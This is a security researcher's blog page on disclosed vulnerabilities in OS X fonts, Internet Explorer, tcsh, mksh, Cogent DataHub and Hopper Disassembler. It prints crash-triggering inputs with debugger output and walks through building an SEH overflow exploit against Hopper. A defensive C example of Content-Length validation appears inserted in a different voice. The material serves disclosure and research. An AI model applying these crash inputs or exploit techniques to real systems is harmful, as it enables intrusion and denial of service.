h0wl's blog - pentester & vuln researcher writing about stuff... (Pawel Wylecial)<br />
<br />
<b>[CVE-2015-3679] Apple OS X morx nSubtables Memory Corruption Remote Code Execution and [CVE-2015-3680] DFont FOND Memory Corruption Remote Code Execution</b> (2015-07-01)<br />
Yesterday Apple released security update <a href="https://support.apple.com/en-us/HT204942" target="_blank">2015-005</a>, which includes fixes for two vulnerabilities related to font parsing in OS X that I reported to the ZDI. See the original advisories for <a href="http://www.zerodayinitiative.com/advisories/ZDI-15-287/" target="_blank">CVE-2015-3679</a> and <a href="http://www.zerodayinitiative.com/advisories/ZDI-15-284/" target="_blank">CVE-2015-3680</a>.<br />
<br />
<br />
<b>Browsing stackoverflow for interesting crashes - Microsoft Internet Explorer 11</b> (2015-06-22)<br />
Here is a nice example of why it is worth browsing <a href="http://stackoverflow.com/">stackoverflow.com</a> for crash reports. Recently I stumbled upon this post:<br />
<a href="http://stackoverflow.com/questions/28114732/internet-explorer-11-crashes-when-angulars-http-post-is-used-with-large-complex">http://stackoverflow.com/questions/28114732/internet-explorer-11-crashes-when-angulars-http-post-is-used-with-large-complex</a><br />
<br />
I checked it out and, as of today (22 Jun 2015), it crashes the latest Internet Explorer 11. The crash log looks interesting:<br />
<script src="https://gist.github.com/h0wl/3069bf4fca8bce27851d.js"></script>
The proof of concept from the post is huge, so I decided to downsize it a bit. Here it is:<br />
<script src="https://gist.github.com/h0wl/26d597ebcfc26f8b2a54.js"></script>
Certainly more readable. As usual, maybe someone will find it useful.<br />
<br />
From one of the comments in the stackoverflow discussion, we can see that Microsoft is already looking into it (23 Jan 2015).<br />
<br />
Update:<br />
<br />
The bug was patched in the July 2015 MS bulletin (probably this one: <a href="https://support.microsoft.com/en-us/kb/3075516" target="_blank">MS15-065 - CVE-2015-2419</a>).<br />
<br />
Update #2:<br />
<br />
Great in-depth analysis of the bug by the guys from Checkpoint: <a href="http://blog.checkpoint.com/2016/02/10/too-much-freedom-is-dangerous-understanding-ie-11-cve-2015-2419-exploitation/">http://blog.checkpoint.com/2016/02/10/too-much-freedom-is-dangerous-understanding-ie-11-cve-2015-2419-exploitation/</a><br />
<br />
<b>Microsoft Internet Explorer 11 Crash PoC</b> (2015-06-07)<br />
A test case that looked interesting at first, but most likely it is only a null pointer dereference. Anyway, you can find the proof of concept below.<br />
<br />
<script src="https://gist.github.com/h0wl/9fc7c336691dbf2607f2.js"></script>
It was tested on Windows 7 and 8.1; it doesn't crash on older versions of IE, as the faulty code was introduced in IE11.<br />
<br />
<script src="https://gist.github.com/h0wl/6ef734172d75bead5f6f.js"></script><br />
<br />
<b>Crashing Shells</b> (2015-04-03)<br />
<div class="tr_bq">
A quick post about two crashes I found in tcsh (the default FreeBSD shell; however, the BSD version does not segfault) and mksh (the default shell on Android). As I'm not planning to research it further, I will just leave it here. Maybe someone will figure out if any of this can be exploited somehow.</div>
<br />
tcsh:<br />
1. Affected version<br />
tcsh 6.18.01 and maybe older. The FreeBSD version handled it just fine.<br />
<br />
2. PoC<br />
<blockquote class="tr_bq">
<b><i>$ perl -e 'print "\$?:<span style="color: #cc0000;">\x80</span>"' | tcsh
</i></b></blockquote>
<br />
<blockquote class="tr_bq" style="white-space: pre-wrap; word-wrap: break-word;">
<b><i>Program received signal SIGSEGV, Segmentation fault.<br />0x080d827a in xputchar (c=8388738) at sh.print.c:156<br />156 if(iscntrl(c) && (ASC(c) < 0x80 || MB_CUR_MAX == 1)) {<br />(gdb) x/i $eip<br />=> 0x80d827a &lt;xputchar&gt;: movzwl (%eax,%ebx,2),%edx</i></b></blockquote>
The last byte (marked in red) can be anything > 0x79 to trigger the crash.<br />
<br />
Android shell / mksh:<br />
<br />
1. Affected version<br />
mksh-R50e and maybe older. Tested on the latest source version and on a Nexus with Android 5.0.1.<br />
<br />
2. PoC<br />
<br />
<blockquote class="tr_bq">
<b><i>D:\Android\sdk\platform-tools>adb shell # run shell</i></b><br />
<b><i>shell@mako:/ $ cd sdcard # must be a dir that is not read-only</i></b><br />
<b><i>cd sdcard</i></b><br />
<b><i>shell@mako:/sdcard $ <span style="color: #cc0000;">4444444444444>4</span> # actual input that causes the crash</i></b><br />
<b><i>4444444444444>4</i></b></blockquote>
<blockquote class="tr_bq">
<br />
<b><i>D:\Android\sdk\platform-tools> # our shell died </i></b></blockquote>
<br />
<script src="https://gist.github.com/h0wl/153ed99d2caf1ab3542a.js"></script><br />
It seems to crash at exec.c:1415 in function iosetup(), at the line:<br />
<blockquote class="tr_bq">
<b><i>if (e->savefd[iop->unit] == 0) {</i></b></blockquote>
<br />
Update:<br />
By manipulating the first part of the expression we can control the EAX and EBP values, e.g.:<br />
<blockquote>
<b><i>$ <span style="color: #cc0000;">10947955850</span>>1</i></b><br />
<br />
<b><i>Program received signal SIGSEGV, Segmentation fault.</i></b><br />
<b><i>0x80009c92 in ?? ()</i></b><br />
<b><i>(gdb) i r</i></b><br />
<b><i>eax <span style="color: #cc0000;">0x8c8c8c8a</span> -1936946038</i></b><br />
<b><i>ecx 0x3 3</i></b><br />
<b><i>edx 0x0 0</i></b><br />
<b><i>ebx 0x8003be50 -2147238320</i></b><br />
<b><i>esp 0xbffff210 0xbffff210</i></b><br />
<b><i>ebp 0x991da068 0x991da068</i></b><br />
<b><i>esi 0x80044a54 -2147202476</i></b><br />
<b><i>edi 0x2 2</i></b><br />
<b><i>eip 0x80009c92 0x80009c92</i></b><br />
<b><i>eflags 0x10206 [ PF IF RF ]</i></b><br />
<b><i>cs 0x73 115</i></b><br />
<b><i>ss 0x7b 123</i></b><br />
<b><i>ds 0x7b 123</i></b><br />
<b><i>es 0x7b 123</i></b><br />
<b><i>fs 0x0 0</i></b><br />
<b><i>gs 0x33 51</i></b></blockquote>
<blockquote class="tr_bq">
<b><i>$ <span style="color: #cc0000;">1000200887800</span>>1<br />Program received signal SIGSEGV, Segmentation fault.<br />0x80009c92 in ?? ()<br />(gdb) i r<br />eax 0xe09e5df8 -526492168<br />ecx 0x3 3<br />edx 0x0 0<br />ebx 0x8003be50 -2147238320<br />esp 0xbffff210 0xbffff210<br />ebp <span style="color: #cc0000;">0x41414344</span> 0x41414344<br />esi 0x80044a54 -2147202476<br />edi 0x2 2<br />eip 0x80009c92 0x80009c92<br />eflags 0x10206 [ PF IF RF ]<br />cs 0x73 115<br />ss 0x7b 123<br />ds 0x7b 123<br />es 0x7b 123<br />fs 0x0 0<br />gs 0x33 51<br />(gdb) bt<br />#0 0x80009c92 in ?? ()<br />Backtrace stopped: Cannot access memory at address <span style="color: #cc0000;">0x41414348</span></i></b></blockquote>
The bug has been patched in the latest R50f release.<br />
Bug report can be seen <a href="https://bugs.launchpad.net/mksh/+bug/1440685" target="_blank">here</a> and the fix <a href="https://github.com/MirBSD/mksh/commit/e1cda74d044c0a2607a3686ce5f9924e6a6c0811" target="_blank">here</a>.<br />
<br />
<b>Microsoft Internet Explorer CShadow Direction Integer Overflow Remote Code Execution CVE-2015-0036 (MS15-009)</b> (2015-02-10)<br />
In this month's bulletin Microsoft has fixed multiple vulnerabilities in Internet Explorer, including one of mine. It was an integer overflow in the CShadow filter which could lead to remote code execution. It affected Internet Explorer 10 and 11. You can find the original ZDI advisory <a href="http://www.zerodayinitiative.com/advisories/ZDI-15-019/">here</a> and the Microsoft bulletin <a href="https://technet.microsoft.com/library/security/dn903755.aspx" target="_blank">here</a>.<br />
<br />
There is some confusion when it comes to the CVE assignment: Microsoft acknowledged me for CVE-2015-0035 (also credited to Sky), while ZDI marked my bug as CVE-2015-0036, which is credited to an anonymous researcher on the bulletin page. I will update this post if something changes regarding that.<br />
<br />
<b>Hopper Disassembler 2.8.7 / 3.6.2 Mach-O Handling Buffer Overflow</b> (2014-11-24)<br />
Inspired by <a href="https://twitter.com/j00ru" target="_blank">@j00ru</a>'s <a href="http://j00ru.vexillium.org/?p=2454" target="_blank">talk</a> at SECURE 2014, I decided to do a quick check of <a href="http://hopperapp.com/" target="_blank">Hopper Disassembler</a> (which is a great tool btw, I highly recommend it).<br />
<br />
As a sample I simply used one of the system tools from OS X (/bin/ls) and started fuzzing. I quickly began recording tons of crashes. The most interesting one was this:<br />
<script src="https://gist.github.com/h0wl/8f0f3ca45de15a452678.js"></script><br />
<br />
And the file diff showed something like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU0S2g60maHjw2CsVnrpdHsjSHme77djJf1C2pTAW2vQISHAOEKyP0FlHwKXBpj2j2FZhyA6jLqaCKTmuKRhn4Ag3vGgvsc_gOFs3EkL1je3sxlUO8TinpMeqgMDaxFad_xHeB2JizU1g/s1600/diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU0S2g60maHjw2CsVnrpdHsjSHme77djJf1C2pTAW2vQISHAOEKyP0FlHwKXBpj2j2FZhyA6jLqaCKTmuKRhn4Ag3vGgvsc_gOFs3EkL1je3sxlUO8TinpMeqgMDaxFad_xHeB2JizU1g/s1600/diff.png" height="249" width="320" /></a></div>
It's pretty straightforward, right? I checked the modules, and a standard SEH exploit should work for us:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDKUUw20s2x7haJyGmDNqx6djYA7lSK0qvwiHl6NC5_Ux250hCvtYic1x9gds5bIAX0jZQlLp05tHwBKiFNlcZnfgJEE8hpiV-ZUCr8b8GagaKIaNiYWoSQSwkZACcN63ysPW4suKSHIw/s1600/nosafesehaslr.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDKUUw20s2x7haJyGmDNqx6djYA7lSK0qvwiHl6NC5_Ux250hCvtYic1x9gds5bIAX0jZQlLp05tHwBKiFNlcZnfgJEE8hpiV-ZUCr8b8GagaKIaNiYWoSQSwkZACcN63ysPW4suKSHIw/s1600/nosafesehaslr.png" height="100" width="320" /></a></div>
I calculated the offsets:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicPrb3tFZQqH7yjSxjQD0W5PvUk2oSHdj8aPyxKkT2Z2QYGvs8D9AR3iZXRgVTvDYg66gjrT5xJsrRUeciy-vZYutE3c3rjOkwGVfmfhcNnhPr3iio_fVkKEPRpt8At_nI7I6Jiz3vD2M/s1600/seh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicPrb3tFZQqH7yjSxjQD0W5PvUk2oSHdj8aPyxKkT2Z2QYGvs8D9AR3iZXRgVTvDYg66gjrT5xJsrRUeciy-vZYutE3c3rjOkwGVfmfhcNnhPr3iio_fVkKEPRpt8At_nI7I6Jiz3vD2M/s1600/seh.png" /></a></div>
By now I thought it was over, but the first problems started to show when I wanted to substitute my A's and B's with pointers and other non-printable characters (e.g. NOPs or INT 3) - Hopper would not crash at all.<br />
Instead of NOPs I could use \x40\x48, which is inc eax, dec eax.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPxKt5VlMr3vKNFoOvY23WZcXguSF9QqCknUKHcZ6KpesVTpWzGz3l1Mv92G8gM5ny2vK2QpvytNM9Q0olwIUPm38wIMfUXyZ8EAP_0CFIazX1voCrL9B8sh7KMi8n5L5vgt_mDZHhRcs/s1600/nop_alt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPxKt5VlMr3vKNFoOvY23WZcXguSF9QqCknUKHcZ6KpesVTpWzGz3l1Mv92G8gM5ny2vK2QpvytNM9Q0olwIUPm38wIMfUXyZ8EAP_0CFIazX1voCrL9B8sh7KMi8n5L5vgt_mDZHhRcs/s1600/nop_alt.png" /></a></div>
<br />
<br />
Regarding the SEH overwrite, I couldn't use a short jump, so I had to find a pointer that would later assemble to an instruction that wouldn't crash. Fortunately libpng had a nice ASCII-printable pointer which I could use for pop pop ret.<br />
<script src="https://gist.github.com/h0wl/52ce46ef1402341660c5.js"></script><br />
<br />
Next there was a problem with ASCII-only shellcode. I needed one of the registers to point to it, but in the case of SEH the registers are XOR'ed. I found a solution <a href="https://www.mattandreko.com/2013/04/06/buffer-overflow-in-hexchat-294/" target="_blank">here</a>. Basically, by using multiple POPAD instructions we can get ESP to point to our buffer and then return to it.<br />
<br />
Now we can just generate our shellcode and place it in the controlled area:<br />
<script src="https://gist.github.com/h0wl/431098c1102112d34f83.js"></script><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2m8eLPAGhochADqu9vyvEZNAC-KA-xkudvx8odgc9jkcAtFl6HQptVflI6svABdEtl2Q27K3eNuqs-C7AcKL45W_aLWGlRXmhvN54lg-oeYI6sRZuwTaetyNEIgwievYJIaUWEbXMKdk/s1600/popad2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2m8eLPAGhochADqu9vyvEZNAC-KA-xkudvx8odgc9jkcAtFl6HQptVflI6svABdEtl2Q27K3eNuqs-C7AcKL45W_aLWGlRXmhvN54lg-oeYI6sRZuwTaetyNEIgwievYJIaUWEbXMKdk/s320/popad2.jpg" /></a></div>
When we let it run we get:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfReDbICAoPS9yfhogWz8B2TaLQBKfu5cgpxUyTUeVuRUVyuFxwXz0HLtwV1cwhth6qL-cNzJjcPAZ0og-JWMj4e1mWkyQjWytohhbcfECo9pVWmuBpex1ZOhvRtMXdGBD8ZhaOJOB4k/s1600/calc_exe2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfReDbICAoPS9yfhogWz8B2TaLQBKfu5cgpxUyTUeVuRUVyuFxwXz0HLtwV1cwhth6qL-cNzJjcPAZ0og-JWMj4e1mWkyQjWytohhbcfECo9pVWmuBpex1ZOhvRtMXdGBD8ZhaOJOB4k/s1600/calc_exe2.png" height="241" width="320" /></a></div>
Short demo:<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/SO2ySmH4j2w?feature=player_embedded' frameborder='0'></iframe></div>
<br />
The final result can be downloaded here: <a href="http://howl.overflow.pl/run_calc" target="_blank">Hopper run calc</a> <br />
<br />
Vulnerable versions:<br />
Hopper 2.8.7 and probably older versions (tested on Windows)<br />
Hopper 3.6.2 and probably older versions (tested on Mac OS X)<br />
Linux version was not tested.<br />
<br />
Timeline: <br />
17 Nov 2014 - issue reported to the vendor<br />
18 Nov 2014 - vendor releases a fix for Mac OS X (3.6.3 version)<br />
24 Nov 2014 - publication of this article<br />
The Windows version remains unpatched, as its development is currently on hold.<br />
<br />
<br />
<b>SyScan360 2014 - Mobile Browsers Security: iOS</b> (2014-07-22)<br />
Last week, together with Lukasz Pilorz, I spoke about mobile browser security on iOS at SyScan360 in Beijing. Visiting China for the first time was a great experience, and the conference itself was just awesome. Cool people, very technical talks and good organization are what make this event exceptional.<br />
<br />
Our slides are already available for download from the conference site <a href="http://www.syscan360.org/slides/2014_EN_MobileBrowsersSecurityiOS_LukaszPilorzPawelWylecial.pdf" target="_blank">here</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRu-2PM7_EiJW4eBQuKBbEab1rXDtQrxwIKHgd5XJKRvdtlPxv5gWJoXKYfyGZZIVnyQhTK2xDCC-_oTkX43UwdqVGxZbAZEUkw1cEVIU-ioJm5KfDWhZLl_3ZQdEvdsTx2_7j4-tpuEo/s1600/syscan2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRu-2PM7_EiJW4eBQuKBbEab1rXDtQrxwIKHgd5XJKRvdtlPxv5gWJoXKYfyGZZIVnyQhTK2xDCC-_oTkX43UwdqVGxZbAZEUkw1cEVIU-ioJm5KfDWhZLl_3ZQdEvdsTx2_7j4-tpuEo/s1600/syscan2.jpg" height="320" width="240" /></a></div>
<br />
<b>Microsoft Internet Explorer 11 (11.0.9600.17107) MSHTML!CStr::_Free Crash</b> (2014-06-22)<br />
Another crash in IE11; maybe someone will find it interesting. It occurs when opening the Developer Tools (F12). After I finished minimizing the test case, it turned out to be just one line:<br />
<script src="https://gist.github.com/h0wl/967d5f7d00e6133a0339.js"></script><br />
<br />
To reproduce the crash it is required to:<br />
1. enable pageheap<br />
2. open the html file<br />
3. press F12/open Developer Tools<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBMxW7fCJvWY0HMBvEExwIwEBOYmHxzD7n-aJHeOigMS7Bd1kyQ-o89dqT7FmMex5Ms3jloOm-nuLizDODsWJ1pURhiwCWQGXS2uBnb1qnxNzV_1W3SRRqeBRhWgPTcQrv_Oc2gwjClqA/s1600/div_f12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBMxW7fCJvWY0HMBvEExwIwEBOYmHxzD7n-aJHeOigMS7Bd1kyQ-o89dqT7FmMex5Ms3jloOm-nuLizDODsWJ1pURhiwCWQGXS2uBnb1qnxNzV_1W3SRRqeBRhWgPTcQrv_Oc2gwjClqA/s1600/div_f12.png" height="184" width="320" /></a></div>
Also, you need the exact build version from the title (or lower), because this issue was fixed in the last Microsoft Security Bulletin (https://technet.microsoft.com/en-us/library/security/ms14-jun.aspx). I have not really investigated that crash, because I found it the day before Patch Tuesday, and when it got fixed I moved on.<br />
<br />
(b5c.5fc): Access violation - code c0000005 (!!! second chance !!!)<br />
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll - <br />
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\MSHTML.dll - <br />
eax=00000000 ebx=00000000 ecx=07d30fdc edx=6bda90b0 esi=07d30fdc edi=0a294fe8<br />
eip=6bc0f36a esp=048b93a0 ebp=048b93bc iopl=0 nv up ei pl zr na pe nc<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246<br />
MSHTML+0x4f36a:<br />
6bc0f36a 8b06 mov eax,dword ptr [esi] ds:0023:07d30fdc=00000001<br />
0:005> .symfix<br />
0:005> .reload<br />
Reloading current modules<br />
................................................................<br />
...............<br />
0:005> r<br />
eax=00000000 ebx=00000000 ecx=07d30fdc edx=6bda90b0 esi=07d30fdc edi=0a294fe8<br />
eip=6bc0f36a esp=048b93a0 ebp=048b93bc iopl=0 nv up ei pl zr na pe nc<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246<br />
MSHTML!CStr::_Free+0x5:<br />
6bc0f36a 8b06 mov eax,dword ptr [esi] ds:0023:07d30fdc=00000001<br />
0:005> k<br />
ChildEBP RetAddr <br />
048b93a0 6c222df4 MSHTML!CStr::_Free+0x5<br />
048b93bc 6c50fb52 MSHTML!CListenerDispatch::ConstructCode+0x78<br />
048b9494 6c365616 MSHTML!CDoc::DynamicAttachDebugger+0x350<br />
048ba078 6bd42176 MSHTML!CDoc::ExecHelper+0x623721<br />
048ba098 6eeb93dd MSHTML!CDoc::Exec+0x21<br />
048ba0e8 6eeb9097 DiagnosticsTap!DebugThreadController::IOleCommandTargetExec+0xb9<br />
048ba11c 6eeb8ef0 DiagnosticsTap!DebugThreadController::EnableSourceRundown+0x4e<br />
048ba134 6eec4294 DiagnosticsTap!DebugThreadController::Initialize+0x81<br />
048ba154 6b5479f1 DiagnosticsTap!TapObject::CreateDebuggerController+0x9f<br />
048ba1d0 6b5474a2 F12Tools!BHOSite::LaunchOutOfProcHost+0x205<br />
048ba454 6b546bdc F12Tools!BHOSite::InitializeWindowsAndThreads+0x3bc<br />
048ba480 75e07051 F12Tools!BHOSite::SetSite+0xb0<br />
048ba498 66d226e8 shcore!IUnknown_SetSite+0x2c<br />
048ba4cc 66f424ab IEFRAME!CBandSite::_AddBandByID+0xe5<br />
048ba508 66f2a446 IEFRAME!CBandSite::AddBandWithCLSID+0x3b<br />
048ba550 66f296e5 IEFRAME!CShellBrowser2::_GetInfoBandBS+0x177<br />
048ba5a4 66f2e01d IEFRAME!CShellBrowser2::_EnsureAndNavigateBand+0x8e<br />
048ba5c8 66ddf834 IEFRAME!CShellBrowser2::_ShowHideBrowserBar+0x60<br />
048ba5ec 66e6712d IEFRAME!CShellBrowser2::_SetBrowserBarState+0x1b9<br />
048ba878 66f2f2f0 IEFRAME!CShellBrowser2::Exec+0x23a758<br />
048bbb38 66e654e8 IEFRAME!CShellBrowser2::v_OnCommand+0xc72<br />
048bc390 66c3b164 IEFRAME!CBaseBrowser2::v_WndProc+0x228497<br />
048bc484 66c281f5 IEFRAME!CShellBrowser2::v_WndProc+0x1ae<br />
048bc4a8 779d75b3 IEFRAME!CShellBrowser2::s_WndProc+0x58<br />
048bc4d4 779d77b8 user32!_InternalCallWinProc+0x23<br />
048bc554 779d9744 user32!UserCallWinProcCheckWow+0x110<br />
048bc5b0 779d9894 user32!DispatchClientMessage+0xb5<br />
048bc5d8 77b92cde user32!__fnDWORD+0x2c<br />
048bc608 779ed2a1 ntdll!KiUserCallbackDispatcher+0x2e<br />
048bc60c 66d093e6 user32!NtUserTranslateAccelerator+0xa<br />
048bc62c 66d09383 IEFRAME!CShellBrowser2::TranslateAcceleratorSB+0x34<br />
048bc654 66d09214 IEFRAME!CShellBrowser2::_MayTranslateAccelerator_CCommonBrowser+0xb7<br />
048bc680 66cf6d9f IEFRAME!CShellBrowser2::_MayTranslateAccelerator+0x3b<br />
048bf840 66c8358f IEFRAME!CTabWindow::_TabWindowThreadProc+0x587<br />
048bf8f8 71ec1b7c IEFRAME!LCIETab_ThreadProc+0x31c<br />
048bf908 6eb531cc iertutil!_IsoThreadProc_WrapperToReleaseScope+0xe<br />
048bf934 762b17ad IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x71<br />
048bf940 77b73af4 KERNEL32!BaseThreadInitThunk+0xe<br />
048bf984 77b73acd ntdll!__RtlUserThreadStart+0x20<br />
048bf994 00000000 ntdll!_RtlUserThreadStart+0x1b<br />
<br />
<b>Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero</b> (2014-05-29)<br />
Recently I was playing with the WeakMap implementation in IE11. The following code caused the browser to crash:<br />
<script src="https://gist.github.com/h0wl/648fb10ba1bf023124ae.js"></script>
<br />
<br />
<blockquote class="tr_bq">
(1c58.20c0): <b>Integer divide-by-zero</b> - code c0000094 (!!! second chance !!!)<br />
eax=00aee241 ebx=059f8cc0 ecx=059f8cc8 edx=00000000 esi=059f8cc8 edi=05171aa0<br />
eip=668756f0 esp=06a6bcbc ebp=06a6bccc iopl=0 nv up ei pl nz na pe nc<br />
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />
jscript9!JsUtil::WeaklyReferencedKeyDictionary&lt;...&gt;::TryGetValueAndRemove+0x1f:<br />
668756f0 f736 <b>div eax,dword ptr [esi] ds:002b:059f8cc8=00000000</b><br />
0:020> k<br />
ChildEBP RetAddr<br />
06a6bccc 66874949 jscript9!JsUtil::WeaklyReferencedKeyDictionary&lt;...&gt;::TryGetValueAndRemove+0x1f<br />
06a6bcec 668a28ca jscript9!Js::JavascriptWeakMapData::Delete+0x2c<br />
06a6bd10 66537530 jscript9!Js::JavascriptWeakMap::EntryDelete+0xc5<br />
06a6c058 66537028 jscript9!Js::InterpreterStackFrame::Process+0x1e3c<br />
06a6c174 06550fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk&lt;1&gt;+0x1e8<br />
WARNING: Frame IP not in any known module. Following frames may be wrong.<br />
06a6c180 665319eb 0x6550fe9<br />
06a6c1c0 66532032 jscript9!Js::JavascriptFunction::CallFunction&lt;1&gt;+0x88<br />
06a6c22c 66531f84 jscript9!Js::JavascriptFunction::CallRootFunction+0x93<br />
06a6c274 66531f0b jscript9!ScriptSite::CallRootFunction+0x42<br />
06a6c298 66592bce jscript9!ScriptSite::Execute+0x6c<br />
06a6c320 6660da36 jscript9!ScriptEngine::ExecutePendingScripts+0x1ab<br />
06a6c3a8 6660eeb8 jscript9!ScriptEngine::ParseScriptTextCore+0x29c<br />
06a6c3f8 56866ba5 jscript9!ScriptEngine::ParseScriptText+0x5a<br />
06a6c430 56866ce1 MSHTML!CActiveScriptHolder::ParseScriptText+0x42<br />
06a6c480 565ea155 MSHTML!CJScript9Holder::ParseScriptText+0x6d<br />
06a6c4e8 56867fa3 MSHTML!CScriptCollection::ParseScriptText+0x155<br />
06a6c5d4 56867bf3 MSHTML!CScriptData::CommitCode+0x2d0<br />
06a6c64c 568679db MSHTML!CScriptData::Execute+0x1fe<br />
06a6c660 5655ed1b MSHTML!CHtmScriptParseCtx::Execute+0x8b<br />
06a6c6d8 56518d27 MSHTML!CHtmParseBase::Execute+0x135<br />
06a6c7fc 565efece MSHTML!CHtmPost::Exec+0x474<br />
06a6c814 565efe52 MSHTML!CHtmPost::Run+0x1c<br />
06a6c834 565f11a2 MSHTML!PostManExecute+0x61<br />
06a6c848 565f1103 MSHTML!PostManResume+0x7b<br />
06a6c878 565e152f MSHTML!CHtmPost::OnDwnChanCallback+0x38<br />
06a6c888 56499bb4 MSHTML!CDwnChan::OnMethodCall+0x19<br />
06a6c8cc 56481c3a MSHTML!GlobalWndOnMethodCall+0x12c<br />
06a6c918 74e562fa MSHTML!GlobalWndProc+0x115<br />
06a6c944 74e56d3a user32!InternalCallWinProc+0x23<br />
06a6c9bc 74e577c4 user32!UserCallWinProcCheckWow+0x109<br />
06a6ca1c 74e5788a user32!DispatchMessageWorker+0x3bc<br />
06a6ca2c 574dbe78 user32!DispatchMessageW+0xf<br />
06a6fbec 5753358f IEFRAME!CTabWindow::_TabWindowThreadProc+0x445<br />
06a6fca4 75f01b7c IEFRAME!LCIETab_ThreadProc+0x31c<br />
06a6fcb4 695431cc iertutil!CIsoScope::_InitManagerEntanglementLock+0x53<br />
06a6fce0 75cb338a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x71<br />
06a6fcec 773e9f72 kernel32!BaseThreadInitThunk+0xe<br />
06a6fd2c 773e9f45 ntdll!__RtlUserThreadStart+0x70<br />
06a6fd44 00000000 ntdll!_RtlUserThreadStart+0x1b</blockquote>
It is caused by a division by zero, so the bug is not exploitable; it is only a simple DoS.<br />
<br />
<b>CVE-2014-3788 and MS14-028</b> (2014-05-19)<br />
Zero Day Initiative (ZDI) has published another advisory for a heap buffer overflow vulnerability in the Cogent DataHub web server that I found. The bug occurred when a negative value was passed in the Content-Length header. The original advisory can be read here: <a href="http://zerodayinitiative.com/advisories/ZDI-14-135/" target="_blank">ZDI-14-135</a>.<br />
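As an added example of the header-handling point above (not DataHub's code; the body cap MAX_BODY is an assumption), here is a weak signed length check beside a parser that accepts only the digits the Content-Length grammar allows:

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumed upper bound on a request body the server is willing to buffer. */
#define MAX_BODY 65536L

/* Weak pattern: atol() accepts a sign, and a signed "too big?" test lets a
 * negative length through. Returns true when the server would go on to
 * allocate and read *len bytes, even though *len may be negative. */
bool naive_length_accepted(const char *value, long *len)
{
    *len = atol(value);                 /* "-1" -> -1, "12abc" -> 12, "" -> 0 */
    if (*len > MAX_BODY)                /* -1 > 65536 is false: the check passes */
        return false;
    return true;                        /* negative length reaches the allocation/copy logic */
}

/* Hardened: Content-Length is 1*DIGIT (RFC 7230 3.3.2). A sign, whitespace,
 * trailing junk, an empty value, overflow, or anything above the cap is
 * refused. Returns the length, or -1 when the header must be refused. */
long long checked_content_length(const char *value)
{
    if (value == NULL || *value == '\0')
        return -1;
    for (const char *p = value; *p != '\0'; p++)
        if (*p < '0' || *p > '9')
            return -1;                  /* "-1", "+5", " 12", "12abc" all fail here */
    errno = 0;
    char *end = NULL;
    unsigned long long n = strtoull(value, &end, 10);
    if (errno == ERANGE || end == value || *end != '\0')
        return -1;                      /* overflow or nothing parsed */
    if (n > (unsigned long long)MAX_BODY)
        return -1;                      /* larger than we are willing to buffer */
    return (long long)n;
}

/* Does the weak check let this header value through? */
bool naive_passes(const char *value)
{
    long len;
    return naive_length_accepted(value, &len);
}

int main(void)
{
    /* Constructed header values; "-1" stands in for the negative value from the advisory. */
    const char *samples[] = { "1234", "-1", "70000", "12abc", "" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-8s naive=%s checked=%lld\n", samples[i],
               naive_passes(samples[i]) ? "accept" : "refuse",
               checked_content_length(samples[i]));
    return 0;
}
```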
<br />
Recently I was also acknowledged by Microsoft for the responsible disclosure (through <a href="http://www.beyondsecurity.com/ssd.html" target="_blank">SSD</a>) of two denial of service vulnerabilities affecting the iSCSI Target (CVE-2014-0255 and CVE-2014-0256). The MS bulletin can be found here: <a href="https://technet.microsoft.com/library/security/ms14-028" target="_blank">MS14-028</a>.<br />
<br />
<b>Browser Shredders</b> (2014-03-10)<br />
